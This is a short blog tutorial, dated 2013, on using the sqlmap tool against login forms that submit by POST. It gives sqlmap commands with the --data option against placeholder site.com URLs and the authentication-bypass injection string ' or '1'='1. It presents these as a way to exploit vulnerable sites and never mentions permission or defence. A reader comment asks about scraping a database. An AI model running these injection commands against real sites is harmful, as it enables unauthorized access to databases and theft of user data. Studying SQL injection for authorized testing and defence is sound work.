Using sqlmap with login forms

By | April 15, 2013

In a previous article we saw how to use sqlmap to exploit vulnerable urls of the form

http://www.site.com/section.php?id=59

where the id parameter for example is vulnerable to sql injection.

Now we shall try to do the same thing with forms, especially login forms. Forms often submit data via post, so the sytanx for launching the sqlmap command would be slightly different.

Its important to note that when working with post submissions, the url provided to sqlmap should be the submission url and not the url that loads the form.

So if the form is loaded on a url say

http://www.site.com/form.php

and it submits to the url

http://www.site.com/form_submit.php

Then the url to use with sqlmap is http://www.site.com/form_submit.php

Another thing is to find out the parameters being submitted to the form. This can be easily done with the DOM inspector of chrome or firebug in firefox.

So lets say the injectable parameter is username. The command would be something like

$ python sqlmap.py -u "http://www.site.com/form_submit.php" --data="username=avc"

The data option indicates that it is a post request. Now if you are lucky enough, then sqlmap will detect sql injection quickly enough. However when working with forms and post data, things dont move quickly.

sqlmap may report the parameter as not injectable since unless the correct username is known, the post submission will not produce a proper page or a TRUE page. sqlmap first needs a true page and then it tries to generate a false page and then compares the two pages to confirm that the parameter is injectable.

However we know that the parameter is injectable because we can get inside just by using the magic word.

' or '1'='1

If the first command of sqlmap reports that the parameter is not injectable, then try the magic word as the parameter value

$ python sqlmap.py -u "http://www.site.com/form_submit.php" --data="username=' or '1'='1"

This command should work if the magic word works from the browser.

About Silver Moon

A Tech Enthusiast, Blogger, Linux Fan and a Software Developer. Writes about Computer hardware, Linux and Open Source software and coding in Python, Php and Javascript. He can be reached at [email protected].

2 Comments

Using sqlmap with login forms
  1. RobertGrey

    what if i have access to the phpmysql DB login and i want to scrape the database i know the database.
    i just need to login with user root and pw.

Leave a Reply

Your email address will not be published. Required fields are marked *